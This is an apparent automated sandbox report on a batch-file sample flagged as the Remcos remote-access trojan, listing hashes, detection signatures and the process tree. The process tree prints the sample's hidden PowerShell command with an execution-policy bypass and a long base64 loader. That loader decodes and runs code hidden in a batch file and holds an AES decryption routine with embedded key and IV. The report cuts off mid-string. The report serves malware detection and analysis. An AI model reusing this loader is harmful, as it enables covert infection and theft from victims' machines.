Edit tour
Windows
Analysis Report
DHM6454.bat
Overview
General Information
| Sample name: | DHM6454.bat |
| Analysis ID: | 1630133 |
| MD5: | 4e50e8da0f46df334c393a334f3c19a9 |
| SHA1: | 7f5678f2771d99fee87d30f50b0e4060f5196710 |
| SHA256: | d9015194f6a3d0f5b47447924127b970690bb1ea0d957ce412e0c83ba604c9aa |
| Tags: | batRATRemcosRATuser-abuse_ch |
| Infos: |   |
 | |
Detection
Batch Injector, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 4576 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\DHM64 54.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4992 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\DHM645 4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 6220 cmdline: "C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('JHVzZXJ OYW1lID0gJ GVudjpVU0V STkFNRTske GZqaWUgPSA iQzpcVXNlc nNcJHVzZXJ OYW1lXGR3b S5iYXQiO2l mIChUZXN0L VBhdGggJHh mamllKSB7I CAgIFdyaXR lLUhvc3QgI kJhdGNoIGZ pbGUgZm91b mQ6ICR4Zmp pZSIgLUZvc mVncm91bmR Db2xvciBDe WFuOyAgICA kZmlsZUxpb mVzID0gW1N 5c3RlbS5JT y5GaWxlXTo 6UmVhZEFsb ExpbmVzKCR 4ZmppZSwgW 1N5c3RlbS5 UZXh0LkVuY 29kaW5nXTo 6VVRGOCk7I CAgIGZvcmV hY2ggKCRsa W5lIGluICR maWxlTGluZ XMpIHsgICA gICAgIGlmI CgkbGluZSA tbWF0Y2ggJ 146OjogPyg uKykkJykge yAgICAgICA gICAgIFdya XRlLUhvc3Q gIkluamVjd GlvbiBjb2R lIGRldGVjd GVkIGluIHR oZSBiYXRja CBmaWxlLiI gLUZvcmVnc m91bmRDb2x vciBDeWFuO yAgICAgICA gICAgIHRye SB7ICAgICA gICAgICAgI CAgICRkZWN vZGVkQnl0Z XMgPSBbU3l zdGVtLkNvb nZlcnRdOjp Gcm9tQmFzZ TY0U3RyaW5 nKCRtYXRja GVzWzFdLlR yaW0oKSk7I CAgICAgICA gICAgICAgI CRpbmplY3R pb25Db2RlI D0gW1N5c3R lbS5UZXh0L kVuY29kaW5 nXTo6VW5pY 29kZS5HZXR TdHJpbmcoJ GRlY29kZWR CeXRlcyk7I CAgICAgICA gICAgICAgI FdyaXRlLUh vc3QgIklua mVjdGlvbiB jb2RlIGRlY 29kZWQgc3V jY2Vzc2Z1b Gx5LiIgLUZ vcmVncm91b mRDb2xvciB HcmVlbjsgI CAgICAgICA gICAgICAgV 3JpdGUtSG9 zdCAiRXhlY 3V0aW5nIGl uamVjdGlvb iBjb2RlLi4 uIiAtRm9yZ Wdyb3VuZEN vbG9yIFllb GxvdzsgICA gICAgICAgI CAgICAgSW5 2b2tlLUV4c HJlc3Npb24 gJGluamVjd GlvbkNvZGU 7ICAgICAgI CAgICAgICA gIGJyZWFrO yAgICAgICA gICAgIH0gY 2F0Y2ggeyA gICAgICAgI CAgICAgICB Xcml0ZS1Ib 3N0ICJFcnJ vciBkdXJpb mcgZGVjb2R pbmcgb3IgZ XhlY3V0aW5 nIGluamVjd GlvbiBjb2R lOiAkXyIgL UZvcmVncm9 1bmRDb2xvc iBSZWQ7ICA gICAgICAgI CAgfTsgICA gICAgIH07I CAgIH07fSB lbHNlIHsgI CAgICBXcml 0ZS1Ib3N0I CJTeXN0ZW0 gRXJyb3I6I EJhdGNoIGZ pbGUgbm90I GZvdW5kOiA keGZqaWUiI C1Gb3JlZ3J vdW5kQ29sb 3IgUmVkOyA gICBleGl0O 307ZnVuY3R pb24gcHp3Y W8oJHBhcmF tX3Zhcil7C SRhZXNfdmF yPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkFlc106O kNyZWF0ZSg pOwkkYWVzX 3Zhci5Nb2R lPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkNpcGhlc k1vZGVdOjp DQkM7CSRhZ XNfdmFyLlB hZGRpbmc9W 1N5c3RlbS5 TZWN1cml0e S5DcnlwdG9 ncmFwaHkuU GFkZGluZ01 vZGVdOjpQS 0NTNzsJJGF lc192YXIuS 2V5PVtTeXN 0ZW0uQ29ud mVydF06OkZ yb21CYXNlN jRTdHJpbmc oJ0h5Yk9mR VlGRHFvMDl QVVVuazcve WlOME8yQjV wbkIzVFJ2U UorRlIxZlk 9Jyk7CSRhZ XNfdmFyLkl WPVtTeXN0Z W0uQ29udmV ydF06OkZyb 21CYXNlNjR TdHJpbmcoJ 2FnbS96L01 JaThBUVlBL 1MvbGE2bWc 9PScpOwkkZ GVjcnlwdG9 yX3Zhcj0kY WVzX3Zhci5 DcmVhdGVEZ WNyeXB0b3I oKTsJJHJld HVybl92YXI 9JGRlY3J5c HRvcl92YXI uVHJhbnNmb 3JtRmluYWx CbG9jaygkc GFyYW1fdmF yLCAwLCAkc GFyYW1fdmF yLkxlbmd0a Ck7CSRkZWN yeXB0b3Jfd mFyLkRpc3B vc2UoKTsJJ GFlc192YXI uRGlzcG9zZ SgpOwkkcmV 0dXJuX3Zhc jt9ZnVuY3R pb24gcHR1b 3IoJHBhcmF tX3Zhcil7C SR5bXVpaj1 OZXctT2JqZ